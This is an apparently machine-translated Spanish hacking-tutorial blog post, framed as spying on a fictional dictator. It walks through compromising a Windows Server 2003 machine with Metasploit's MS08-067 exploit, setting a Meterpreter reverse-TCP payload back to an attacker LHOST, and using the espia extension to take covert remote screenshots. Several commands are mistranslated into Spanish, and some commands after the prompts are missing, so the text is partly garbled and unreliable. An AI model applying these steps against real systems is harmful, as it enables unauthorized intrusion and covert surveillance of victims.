BlogHack Like a Pro

Hackear como un profesional Cómo tomar de forma remota una captura de pantalla de la computadora comprometida de alguien

¡Bienvenidos de nuevo, mis hackers novatos!

Ya salvamos al mundo de la aniquilación nuclear y después cubrimos nuestras huellas, pero el mundo todavía está amenazado por un dictador malicioso y megalómano con misiles y armas nucleares.

Necesitamos vigilarlo de cerca, por lo que en este truco, instalaremos un script para tomar una captura de pantalla periódicamente de lo que esté haciendo en su computadora. De esa manera podemos monitorear sus actividades y, con suerte, mantener el mundo seguro.

Entonces, enciendamos Metasploit y vayamos tras este dictador maligno, maníaco y malicioso.

Paso 1: configura el truco

Primero, seleccionemos un exploit para usar. Como está usando un sistema Windows Server 2003, me gusta usar el MS08_067_ netapi explotar, así que escriba:

  • msf> use exploit / windows / smb / ms08_067_netapi

Para simplificar nuestras capturas de pantalla, necesitaremos usar la carga útil Meterpreter de Metasploit. Cargámoslo en nuestro exploit de la siguiente manera:

  • msf> (ms08_067_netapi) establecer las ventanas de carga útil / meterpreter / reverse_tcp

A continuación, debemos configurar nuestras opciones. En este punto, me gusta usar el comando “mostrar opciones” para ver qué opciones son necesarias para ejecutar este truco.

  • msf> (ms08_067_netapi) mostrar opciones

Como sea posible, necesitamos configurar las direcciones IP RHOST (la víctima) y LHOST (el atacante o nosotros). Después de hacer esto, deberíamos estar listos para tomar el control de su sistema.

  • msf> (ms08_067_netapi) establece RHOST 192.168.1.108
  • msf> (ms08_067_netapi) establece LHOST 192.168.1.109

Ahora, si hicimos todo correctamente, deberíamos poder explotar la computadora del dictador y poner el Meterpreter en ella, dándonos el control total de su computadora.

  • msf> (ms08_067_netapi) exploit

Como puede ver, recibimos un símbolo del sistema de Meterpreter y ¡estamos listos para comenzar!

Paso 2: tomar una captura de pantalla

Antes de comenzar a trabajar en la computadora del dictador malicioso, averigüemos qué ID de proceso (PID) estamos usando. Tipo:

Como puede ver en la captura de pantalla, estamos usando el PID de 932 en la computadora del dictador. Ahora verifiquemos qué proceso es obteniendo una lista de todos los procesos con sus PID correspondientes. Tipo:

Podemos ver que el PID de 932 corresponde al svrhost.exe proceso. Ya que estamos usando un proceso con permisos de escritorio activos, estamos listos para comenzar. De lo contrario, tendríamos que migrar a un proceso con permisos de escritorio activos.

Ahora todo lo que tenemos que hacer es activar un script integrado en Meterpreter llamado espia. Simplemente escriba:

Ejecutar este script simplemente instala espia en la computadora del malo. Ahora necesitamos tomar una captura de pantalla de su computadora escribiendo:

Cuando hacemos esto, el script espia toma una captura de pantalla de la computadora de nuestro dictador, la guarda en el directorio de nuestro usuario raíz y nos muestra una copia.

Como podemos ver arriba, hemos tomado con éxito una captura de pantalla de la computadora de nuestro chico malo. Parece que no está tramando nada bueno otra vez, revisando a esos Twinkies que están en ruta.

Fotos por Nenetus / Shutterstock, Picsfive / Shutterstock

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba
Cerrar